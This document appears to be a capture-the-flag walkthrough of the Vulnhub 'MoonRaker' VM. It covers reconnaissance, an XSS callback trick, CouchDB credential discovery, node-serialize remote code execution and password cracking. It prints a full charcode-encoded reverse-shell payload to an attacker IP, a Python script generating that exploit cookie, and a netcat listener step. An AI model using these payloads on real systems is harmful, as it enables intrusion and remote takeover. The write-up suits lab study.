2019-01-23 Vulnhub penetration testing practice writeup (17)

MoonRaker... I picked this one because the cover art looked nice... and port 80 even plays a video when you visit it.


[screenshot p1]

nmap results:

# Nmap 7.40 scan initiated Tue Jan 22 21:47:44 2019 as: nmap -p- -A -sV -Pn -oN 1.xml 192.168.110.143
Nmap scan report for 192.168.110.143
Host is up (0.0012s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey: 
|   2048 5f:bf:c0:33:51:4f:4a:a7:4a:7e:15:80:aa:d7:2a:0b (RSA)
|_  256 53:59:87:1e:a4:46:bd:a7:fd:9a:5f:f9:b7:40:9d:2f (ECDSA)
80/tcp    open  http     Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: MOONRAKER
3000/tcp  open  http     Node.js Express framework
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=401
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
4369/tcp  open  epmd     Erlang Port Mapper Daemon
| epmd-info: 
|   epmd_port: 4369
|   nodes: 
|_    couchdb: 42665
5984/tcp  open  couchdb?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Object Not Found
|     Cache-Control: must-revalidate
|     Connection: close
|     Content-Length: 58
|     Content-Type: application/json
|     Date: Wed, 23 Jan 2019 10:49:14 GMT
|     Server: CouchDB/2.2.0 (Erlang OTP/19)
|     X-Couch-Request-ID: a2af5cdd93
|     X-CouchDB-Body-Time: 0
|     {"error":"not_found","reason":"Database does not exist."}
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Cache-Control: must-revalidate
|     Connection: close
|     Content-Length: 164
|     Content-Type: application/json
|     Date: Wed, 23 Jan 2019 10:48:22 GMT
|     Server: CouchDB/2.2.0 (Erlang OTP/19)
|     X-Couch-Request-ID: 8ff88fda87
|     X-CouchDB-Body-Time: 0
|     {"couchdb":"Welcome","version":"2.2.0","git_sha":"2a16ec4","features":["pluggable-storage-engines","scheduler"],"vendor":{"name":"The Apache Software Foundation"}}
|   HTTPOptions: 
|     HTTP/1.0 500 Internal Server Error
|     Cache-Control: must-revalidate
|     Connection: close
|     Content-Length: 61
|     Content-Type: application/json
|     Date: Wed, 23 Jan 2019 10:48:22 GMT
|     Server: CouchDB/2.2.0 (Erlang OTP/19)
|     X-Couch-Request-ID: e1640da16c
|     X-Couch-Stack-Hash: 1828508689
|     X-CouchDB-Body-Time: 0
|_    {"error":"unknown_error","reason":"badarg","ref":1828508689}
42665/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5984-TCP:V=7.40%I=7%D=1/22%Time=5C47D5F6%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,1A3,"HTTP/1\.0\x20200\x20OK\r\nCache-Control:\x20must-revalida
SF:te\r\nConnection:\x20close\r\nContent-Length:\x20164\r\nContent-Type:\x
SF:20application/json\r\nDate:\x20Wed,\x2023\x20Jan\x202019\x2010:48:22\x2
SF:0GMT\r\nServer:\x20CouchDB/2\.2\.0\x20\(Erlang\x20OTP/19\)\r\nX-Couch-R
SF:equest-ID:\x208ff88fda87\r\nX-CouchDB-Body-Time:\x200\r\n\r\n{\"couchdb
SF:\":\"Welcome\",\"version\":\"2\.2\.0\",\"git_sha\":\"2a16ec4\",\"featur
SF:es\":\[\"pluggable-storage-engines\",\"scheduler\"\],\"vendor\":{\"name
SF:\":\"The\x20Apache\x20Software\x20Foundation\"}}\n")%r(HTTPOptions,16E,
SF:"HTTP/1\.0\x20500\x20Internal\x20Server\x20Error\r\nCache-Control:\x20m
SF:ust-revalidate\r\nConnection:\x20close\r\nContent-Length:\x2061\r\nCont
SF:ent-Type:\x20application/json\r\nDate:\x20Wed,\x2023\x20Jan\x202019\x20
SF:10:48:22\x20GMT\r\nServer:\x20CouchDB/2\.2\.0\x20\(Erlang\x20OTP/19\)\r
SF:\nX-Couch-Request-ID:\x20e1640da16c\r\nX-Couch-Stack-Hash:\x20182850868
SF:9\r\nX-CouchDB-Body-Time:\x200\r\n\r\n{\"error\":\"unknown_error\",\"re
SF:ason\":\"badarg\",\"ref\":1828508689}\n")%r(FourOhFourRequest,146,"HTTP
SF:/1\.0\x20404\x20Object\x20Not\x20Found\r\nCache-Control:\x20must-revali
SF:date\r\nConnection:\x20close\r\nContent-Length:\x2058\r\nContent-Type:\
SF:x20application/json\r\nDate:\x20Wed,\x2023\x20Jan\x202019\x2010:49:14\x
SF:20GMT\r\nServer:\x20CouchDB/2\.2\.0\x20\(Erlang\x20OTP/19\)\r\nX-Couch-
SF:Request-ID:\x20a2af5cdd93\r\nX-CouchDB-Body-Time:\x200\r\n\r\n{\"error\
SF:":\"not_found\",\"reason\":\"Database\x20does\x20not\x20exist\.\"}\n");
MAC Address: 00:0C:29:85:81:B5 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT     ADDRESS
1   1.17 ms 192.168.110.143
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 22 21:50:27 2019 -- 1 IP address (1 host up) scanned in 163.82 seconds

dirb found nothing that led anywhere (just /accounting/, /cats/, /services/ and robots.txt):


-----------------
DIRB v2.22    
By The Dark Raver
-----------------

OUTPUT_FILE: result.txt
START_TIME: Tue Jan 22 21:59:27 2019
URL_BASE: http://192.168.110.143/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.110.143/ ----
==> DIRECTORY: http://192.168.110.143/accounting/
==> DIRECTORY: http://192.168.110.143/cats/
+ http://192.168.110.143/index.html (CODE:200|SIZE:422)
+ http://192.168.110.143/robots.txt (CODE:200|SIZE:26)
+ http://192.168.110.143/server-status (CODE:403|SIZE:303)
==> DIRECTORY: http://192.168.110.143/services/

---- Entering directory: http://192.168.110.143/accounting/ ----
+ http://192.168.110.143/accounting/index.php (CODE:200|SIZE:55)

---- Entering directory: http://192.168.110.143/cats/ ----

---- Entering directory: http://192.168.110.143/services/ ----
+ http://192.168.110.143/services/index.html (CODE:200|SIZE:1756)

-----------------
END_TIME: Tue Jan 22 21:59:55 2019
DOWNLOADED: 18448 - FOUND: 5

After staring at the host for ages I found no usable vulnerability. On the web side the only thing I found was an XSS, but with no cookie to steal it seemed useless...
Reading a walkthrough showed the trick: the services page has a message board (it writes whatever you submit into a log, but we don't know the name or path of the script that processes that log). So the XSS payload makes the victim's browser fetch something from an Apache server we run; the Referer field of that request in our access log then shows which page the payload was triggered from.
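An added example of the log-side half of that trick (not part of the original writeup): assuming the injected payload loads http://<our-ip>/beacon.js, this parses Apache combined-format access log lines, keeps only requests for that beacon path from the target, and prints the Referer path that names the page the XSS ran on. The log lines are constructed samples; the attacker IP 192.168.110.128 and the beacon path are assumptions.

```python
"""Added example: recover the page an XSS fired on from our own Apache
access.log, using the Referer header of the callback request.
The sample log lines below are constructed, not taken from the writeup."""
import re
from urllib.parse import urlsplit

# Apache "combined" LogFormat:
# %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample log: first two lines are the victim's browser (the XSS
# payload is assumed to load /beacon.js from our box), the third is our own
# curl test of the beacon, which must be ignored.
SAMPLE_LOG = """\
192.168.110.143 - - [22/Jan/2019:22:31:07 +0800] "GET /beacon.js HTTP/1.1" 404 196 "http://192.168.110.143/svc-inq/salesmoon-gui.php" "Mozilla/5.0 (X11; Linux x86_64) Firefox/60.0"
192.168.110.143 - - [22/Jan/2019:22:31:08 +0800] "GET /favicon.ico HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/60.0"
192.168.110.128 - - [22/Jan/2019:22:30:00 +0800] "GET /beacon.js HTTP/1.1" 404 196 "-" "curl/7.61.0"
"""


def parse_combined(line):
    """Return the named fields of one combined-format line, or None when the
    line does not match (garbage in the log must not crash the parser)."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def callback_referers(log_text, beacon_path, target_ip=None):
    """Distinct (client_ip, referer_path) pairs for requests of beacon_path,
    optionally limited to target_ip so our own test hits are dropped.
    A Referer of "-" means the browser sent none, so it is skipped."""
    seen, found = set(), []
    for line in log_text.splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue
        parts = rec["request"].split()          # "GET /beacon.js HTTP/1.1"
        if len(parts) < 2 or parts[1].split("?", 1)[0] != beacon_path:
            continue
        if target_ip and rec["host"] != target_ip:
            continue
        if rec["referer"] == "-":
            continue
        path = urlsplit(rec["referer"]).path
        if (rec["host"], path) not in seen:
            seen.add((rec["host"], path))
            found.append((rec["host"], path))
    return found


if __name__ == "__main__":
    for ip, path in callback_referers(SAMPLE_LOG, "/beacon.js", "192.168.110.143"):
        print(f"{ip} executed our payload on {path}")
```

On the real box the same information is in /var/log/apache2/access.log once the target's browser has fetched the beacon; a `<script src>` or `<img src>` both send the Referer, as long as the page does not set a restrictive Referrer-Policy.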


[screenshot p2]

That tells us directly which file does the processing, so we just browse to it... A trick worth learning; it will come in handy later.

http://192.168.110.143/svc-inq/salesmoon-gui.php

Two things on this page deserve attention. The first is hugo.txt, with the following content:

FYI Hugo's custom page is being rebuilt over on the NodeJS server running on port 3000. Here's a snippet of the backend code for cookie input..this is once you get past the Username/password prompt.

The dev team is still creating most of the front end, but we will have to "secure the code" since we're now not only tasked with sales, but also secure code review. How do they expect to offer all of these extra services without hiring more ppl? Never thought I'd be a nerdy "coder"!

Here's the snippet, you'll need nodejs and other stuff to run. It looks good to me so I've pushed to prod...

//Stuff to import
var express = require('express');
var cookieParser = require('cookie-parser');
var escape = require('escape-html');
var serialize = require('node-serialize');
var app = express();
app.use(cookieParser()); // without this middleware req.cookies is undefined

// Here's the function they want reviewed...
// I think it decodes the weird cookie string and runs it, prints it, sets it or idk.

app.get('/', function(req, res) {
    if (req.cookies.profile) {
        // base64-decode the cookie and hand it straight to node-serialize;
        // unserialize() eval()s any _$$ND_FUNC$$_ function it finds, so the
        // client controls code execution before obj.username is even read
        var str = new Buffer(req.cookies.profile, 'base64').toString();
        var obj = serialize.unserialize(str);
        if (obj.username) {
            res.send("Stuff here then print out username.. " + escape(obj.username));
        }
    } else {
        // first visit: set the default cookie, {"username":"hugo"} in base64
        res.cookie('profile', "eyJ1c2VybmFtZSI6Imh1Z28ifQ==", {
            maxAge: 900000,
            httpOnly: true
        });
    }
});
app.listen(3000);

My JavaScript reading still needs work..... but the key point here is the profile cookie: it is base64-decoded and handed straight to serialize.unserialize(), and that is the parameter we care about.
The other page to note is http://192.168.110.143/svc-inq/couchnotes.txt, with the following content:

--Our new devs are building a front end to work with CouchDB backend. For now most data collection needs to be done manually.

--For you new sales folks, using curl to interact with couch is slick. Otherwise the front end admin panel is available.
-----Contact me in office if you'd like a user created.

--Quick path to check for DB's created, then you can dive into each if you have permissions.
/_all_dbs
------------For Jaws' eyes only below the line------------------
--my password
hint: girlfriends name + "x99" w/o quotes 

This hints that the CouchDB username is jaws, and that the password is his girlfriend's name plus x99:

[screenshot p3]

So the password is Dollyx99. We have credentials but no obvious CouchDB login page, so what next? Look for the stock admin UI that CouchDB ships with (Fauxton, under /_utils/), which is here:

http://192.168.110.143:5984/_utils/#login

Once logged in there are three databases, but only link is readable; the other two give permission errors.

[screenshot p4]

Opening link directly shows four links:

/cats/cats-gallery.html  # the cat gallery from earlier
/surv-cam/recent.html  # click this one and look carefully... no comment
/HR-Confidential/offer-letters.html  # this one has something
/x-files/deep-space-findings.html  # nothing found here

The third link looks like this...

[screenshot p5]

Together with the page seen earlier, the user hugo is the one to look at first, and sure enough there is something:
[screenshot p6]

[screenshot p7]

This gives a username and password. The earlier nmap scan showed a Node.js Express app on port 3000 that asks for HTTP Basic credentials, and this should be them... tried it, and it works...
[screenshot p8]

The Node.js app here has a deserialization vulnerability (node-serialize) that gives a shell directly. A reference article first:
https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
[screenshot p9]

Per the reference article, the deserialized field is the profile value in the Cookie header, so we intercept the request, generate a payload and swap it into that cookie to get a shell. This is also where the credentials obtained earlier matter: the app sits behind Basic auth, so the request has to carry the Authorization header for the payload to reach the vulnerable handler at all.
The intercepted request:

GET / HTTP/1.1
Host: 192.168.110.143:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: AuthSession=amF3czo1QzQ5RUFCRjqL4fuwv3GwQ70_iK99c_oPA_8RCw; profile=eyJ1c2VybmFtZSI6Imh1Z28ifQ%3D%3D
Authorization: Basic aHVnbzpUZW1wbGVMYXNlcnNMMks=
Connection: keep-alive
If-None-Match: W/"5c-Hu0fOrq4gpzRr1hphtyepFR+674"
Cache-Control: max-age=0

The cookie value is base64-encoded.
Python script: https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py
The process:

python test.py 192.168.110.128 7777
The generated payload, wrapped in the {"rce":"_$$ND_FUNC$$_function (){eval(...)}()"} envelope, looks like this (the trailing () turns the function into an IIFE, so it runs during unserialize() without any property of the object being accessed):
{"rce":"_$$ND_FUNC$$_function (){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,49,49,48,46,49,50,56,34,59,10,80,79,82,84,61,34,55,55,55,55,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}()"}
Then base64-encode the whole thing and set it as the value of the profile cookie.
[screenshot p10]
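An added example (not the writeup's own script, and not nodejsshell.py) that builds the same cookie end to end, so the three manual steps above can be repeated without copy-pasting the charcode blob: the reverse-shell JavaScript is encoded as a String.fromCharCode(...) list so quotes and newlines survive the JSON envelope, wrapped in a _$$ND_FUNC$$_ immediately-invoked function, then base64-encoded for the profile cookie. Attacker host 192.168.110.128 and port 7777 are taken from the command above; nothing here connects anywhere.

```python
"""Added example: build the node-serialize RCE cookie for the profile field.
This is independent code, not the original writeup's script."""
import base64
import json

# Reverse shell for Node, same logic as the decoded charcode blob above
# (including the String.prototype.contains polyfill). %s slots are filled
# with the listener host and port.
REVERSE_SHELL_JS = """
var net = require('net');
var spawn = require('child_process').spawn;
HOST="%s";
PORT="%s";
TIMEOUT="5000";
if (typeof String.prototype.contains === 'undefined') { String.prototype.contains = function(it) { return this.indexOf(it) != -1; }; }
function c(HOST,PORT) {
    var client = new net.Socket();
    client.connect(PORT, HOST, function() {
        var sh = spawn('/bin/sh',[]);
        client.write("Connected!\\n");
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
        sh.on('exit',function(code,signal){
          client.end("Disconnected!\\n");
        });
    });
    client.on('error', function(e) {
        setTimeout(c(HOST,PORT), TIMEOUT);
    });
}
c(HOST,PORT);
"""


def charcode_encode(js):
    """Encode JS as a String.fromCharCode(...) expression so the payload holds
    no quotes, backslashes or newlines that JSON/cookie handling could mangle."""
    return "String.fromCharCode(%s)" % ",".join(str(ord(ch)) for ch in js)


def build_serialized_object(js):
    """node-serialize treats a string value starting with _$$ND_FUNC$$_ as
    function source and eval()s it on unserialize(); the trailing () makes it
    an IIFE so it runs during deserialization, no property access required."""
    func = "_$$ND_FUNC$$_function (){eval(%s)}()" % charcode_encode(js)
    return json.dumps({"rce": func})


def build_profile_cookie(host, port):
    """Return the base64 value to place in the profile cookie."""
    js = REVERSE_SHELL_JS % (host, port)
    return base64.b64encode(build_serialized_object(js).encode()).decode()


def decode_profile_cookie(cookie):
    """Inverse, for checking what the server will see: base64-decode and
    parse the JSON envelope."""
    return json.loads(base64.b64decode(cookie))


if __name__ == "__main__":
    # Send as: Cookie: profile=<value>  (plus the Basic Authorization header)
    print(build_profile_cookie("192.168.110.128", "7777"))
```

Start the listener first (nc -lvp 7777), then replay the intercepted GET with the new cookie value; the request must still carry the Authorization header, otherwise the 401 is returned before the cookie is ever parsed.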

Then the reverse shell comes back. It is not an interactive shell, so upgrade it with python, e.g. python -c 'import pty; pty.spawn("/bin/bash")'.
After getting the shell I poked around: there is no write permission where it would be needed, so DirtyCOW is out; the earlier hint that the log is cleaned up periodically suggested a privilege escalation through that scheduled job, but that turned out not to be writable either...
The only thing left was to hunt for config files: I found the CouchDB directory directly and looked at its local.ini.

[screenshot p11]

It contains hugo's username and password, and su hugo works.
At this point I got stuck, lol. No way forward, so back to the walkthrough, which says the VM author left a hint in hugo's mail. You'd never find that normally....


[screenshot p12]

[screenshot p13]

It gives a password hash and says VR00M has to be appended to the password.
Time to learn john, the hash cracker in Kali: save the hash to a file and run john against that file.
[screenshot p14]

So the password is cyberVR00M.
[screenshot p15]

After base64 decoding it reads:
was dolly wearing braces?
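An added example (not part of the writeup) of what "append VR00M, then run john" means in practice: a plain wordlist never contains cyberVR00M, so each candidate has to be mangled with an append-suffix rule before hashing (john's equivalent is a rule line Az"VR00M" in a custom rule section). The hash algorithm is an assumption, since the page never shows the mail hint's hash format: plain SHA-256 stands in for it, and the target hash is constructed from the password the writeup recovered.

```python
"""Added example: rule-based cracking with an append-suffix rule, the idea
behind cracking the VR00M-suffixed root password. Hash type is an assumption."""
import hashlib

SUFFIX = "VR00M"

# Constructed wordlist fragment (common words like these are in john's default list)
WORDLIST = ["password", "moonraker", "dolly", "bond", "cyber", "hugo"]


def hash_candidate(candidate):
    """Stand-in for the real hash function (assumption: SHA-256 hex digest)."""
    return hashlib.sha256(candidate.encode()).hexdigest()


def mangle(word, suffix):
    """Yield the rule variants of one wordlist entry, cheapest first:
    the word itself, word+suffix, Capitalised word, Capitalised word+suffix."""
    yield word
    yield word + suffix
    yield word.capitalize()
    yield word.capitalize() + suffix


def crack(target_hash, wordlist, suffix):
    """Return the first mangled candidate whose hash equals target_hash,
    or None if the wordlist plus rules never reach it."""
    for word in wordlist:
        for cand in mangle(word, suffix):
            if hash_candidate(cand) == target_hash:
                return cand
    return None


# Constructed target: the hash of the password the writeup recovered.
TARGET = hash_candidate("cyberVR00M")

if __name__ == "__main__":
    print(crack(TARGET, WORDLIST, SUFFIX))
```

Without the suffix rule the same wordlist fails, which is exactly why the hint in the mail is needed: the base word is ordinary, the appended string is not.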
Summary:
This box proved once again that my skills are not up to challenge-difficulty machines....
First, the XSS plus an out-of-band callback to our own web server reveals the name and path of the script that processes the log; browsing to it yields the CouchDB credentials, and the CouchDB data yields the Node.js Basic-auth credentials. A node-serialize deserialization bug then gives a shell; the CouchDB config file gives hugo's password for su; finally hugo's mail holds the root password hash, which john cracks for a direct root login.
